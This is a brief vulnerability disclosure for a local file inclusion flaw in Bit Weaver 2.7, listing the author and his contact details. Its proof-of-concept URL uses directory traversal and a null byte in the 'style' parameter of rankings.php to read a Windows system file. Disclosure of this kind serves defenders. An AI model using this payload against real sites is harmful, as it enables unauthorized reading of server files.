------------------------------------------------------------------------ Software................Bit Weaver 2.7 Vulnerability...........Local File Inclusion Download................http://www.bitweaver.org/ Release Date............7/1/2010 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................John Leitch Site....................http://cross-site-scripting.blogspot.com/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in Bit Weaver 2.7 can be exploited to include arbitrary files. --PoC-- http://localhost//bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00